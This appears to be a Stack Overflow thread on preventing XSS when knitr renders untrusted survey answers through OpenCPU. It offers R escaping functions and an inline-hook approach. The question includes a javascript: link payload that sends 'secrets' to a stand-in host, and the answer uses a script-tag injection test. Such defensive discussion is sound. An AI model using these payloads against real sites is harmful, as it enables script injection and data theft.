I'm using OpenCPU and knitr to generate custom feedback after surveys. To this end, I basically let survey developers specify Rmd files. In this use case, the survey developers are trusted, but the survey takers may not be.

I'm now thinking about XSS. It's not a big worry, since feedback will usually only be displayed to the user who entered the data. Still, characters like '<' will be used for non-malicious reasons, and I'd like to think ahead and explore some of the trials and tribulations of freely mixing R with web apps.

Knitr and R in general were not made with untrusted users and XSS in mind. OpenCPU rectifies many of the security issues of running R as an API by sandboxing it with AppArmor, but I wonder whether a maximum-flexibility approach like mine can also be made safe.

Possible points at which one might separate trusted and untrusted markup:

  1. Before knitting, i.e. I pass escaped user data to the Rmd file. Drawback: an oblivious survey dev might unescape it, either accidentally or because the escaping is annoying in some context.
  2. During knitting. This would be ideal, I guess, but I don't know whether it's possible, especially if a survey dev could alter chunk settings.
  3. After knitting. I think it's impossible to separate trusted and untrusted markup post hoc.
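As a rough illustration of option 2, one could override knitr's `inline` output hook so that everything printed via inline R code is escaped. This is only a sketch under assumptions: `escape_untrusted` is a hypothetical helper, the code is assumed to sit in a setup chunk that the platform prepends to every survey dev's Rmd file, and it does not cover chunks printed with `results='asis'`.

```r
# Hypothetical helper: neutralise HTML and Markdown syntax in untrusted text.
escape_untrusted <- function(x) {
  x <- as.character(x)
  # HTML: the ampersand goes first so the entities created below are not re-escaped.
  x <- gsub("&", "&amp;", x, fixed = TRUE)
  x <- gsub("<", "&lt;", x, fixed = TRUE)
  x <- gsub(">", "&gt;", x, fixed = TRUE)
  x <- gsub("\"", "&quot;", x, fixed = TRUE)
  # Markdown: put a backslash in front of every character that can start markup.
  gsub("([\\\\`*_{}\\[\\]()#+.!-])", "\\\\\\1", x, perl = TRUE)
}

# Assumption: this runs inside a setup chunk of the document being knit.
if (requireNamespace("knitr", quietly = TRUE)) {
  knitr::knit_hooks$set(inline = function(x) {
    # Collapse vectors to one string, then escape the result.
    escape_untrusted(paste(x, collapse = ", "))
  })
}
```

The trade-off is that a survey dev can no longer emit Markdown deliberately from inline code, and since they are trusted they can still reset the hook, so this guards against accidents rather than against intent.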

Some code to paste into OpenCPU's knitr app:

```{r}
good_userdata = 'I like brackets [].'
bad_userdata = 'some text should not be 
[linked](javascript:location.href=\'http://example.com?secrets\';), <s>struck</s> or __bold__'

escape_html = highr:::escape_html
escape_md <- function(x){
  x <- gsub('\\[', '\\\\[', x);
  x <- gsub('_', '\\\\_', x);
  x
} 
good_userdata_escaped = escape_md(escape_html(good_userdata))
bad_userdata_escaped = escape_md(escape_html(bad_userdata))
```

## let's say a survey dev wants to print text like this
```{r}
cat(good_userdata_escaped)
cat(bad_userdata_escaped) # doesn't know about text like this
```

## gets annoyed, does
```{r}
good_userdata_escaped <- gsub('\\\\', '', good_userdata_escaped);
bad_userdata_escaped <- gsub('\\\\', '', bad_userdata_escaped);
```

## so that this looks nice
```{r}
cat(good_userdata_escaped)
```

## later renders the same text inline, so that it is evaluated as markdown

`r good_userdata_escaped # doesn't look dangerous`

`r bad_userdata_escaped`

Edit 2

Sorry, I had provided only some HTML tags, thinking possible XSS attacks were obvious. Michel Fortin had some examples on his page.

Ruben

1 Answer

I'm not 100% sure I understand your concern. If you're worried about XSS, you're worried about users including a JavaScript `<script>` tag or similar in the markdown, right?

```{r}
userdata = '<script>alert("I am evil")</script>'
```

```{r,results='asis'}
cat(userdata)
```

You can prevent this by escaping HTML characters. I think there's a section on this in the Markdown definition. So you would need to escape all user input, either when inserting it into your DB or when extracting it:

escape <- function(x){
  x <- gsub("&", "&amp;", x);
  x <- gsub("<", "&lt;", x);
  x <- gsub(">", "&gt;", x);
  x
} 
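Order matters in a function like this: `&` has to be replaced before `<` and `>`, otherwise the ampersands of the freshly created entities get escaped a second time. A small base R sketch of the difference (the function names are hypothetical, for illustration only):

```r
# Escapes "&" last: the "&" inside "&lt;" and "&gt;" is escaped again.
escape_amp_last <- function(x) {
  x <- gsub("<", "&lt;", x, fixed = TRUE)
  x <- gsub(">", "&gt;", x, fixed = TRUE)
  gsub("&", "&amp;", x, fixed = TRUE)
}

# Escapes "&" first: each special character is escaped exactly once.
escape_amp_first <- function(x) {
  x <- gsub("&", "&amp;", x, fixed = TRUE)
  x <- gsub("<", "&lt;", x, fixed = TRUE)
  gsub(">", "&gt;", x, fixed = TRUE)
}

input <- "a < b & c"
escape_amp_last(input)   # "a &amp;lt; b &amp; c"
escape_amp_first(input)  # "a &lt; b &amp; c"
```

Both variants block the script injection, but the first one makes the browser display a literal `&lt;` instead of `<`.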

Try running the following:

```{r output}
escape <- function(x){
  x <- gsub("&", "&amp;", x);
  x <- gsub("<", "&lt;", x);
  x <- gsub(">", "&gt;", x);
  x
} 
```

```{r}
userdata = escape('<script>alert("I am evil")</script>')
```

```{r,results='asis'}
cat(userdata)
```

That should take care of any code injection. I'm not quite sure how the `__bold__` example is a concern, because as far as I can see it cannot be used for an XSS attack, as there is no scripting. But if you want to prevent users from messing with the layout too, then you should escape all Markdown characters, I guess.

Jeroen Ooms
  • Thanks. Well, I'm thinking about scripting, but also accidental formatting changes (modified the question a little). I thought, if I escape the user data upon retrieval from the DB, then an oblivious survey developer might somehow end up annoyed with backslashed markdown characters, they might attempt to remove them and then again open the door for XSS. A bit contrived, I know, but that's why I'm asking whether there's a way to basically disallow 'asis' printing of HTML and markdown, so that all HTML/Markdown that is not outside a code chunk gets escaped. It might be more of a `knitr` question – Ruben Nov 06 '13 at 17:00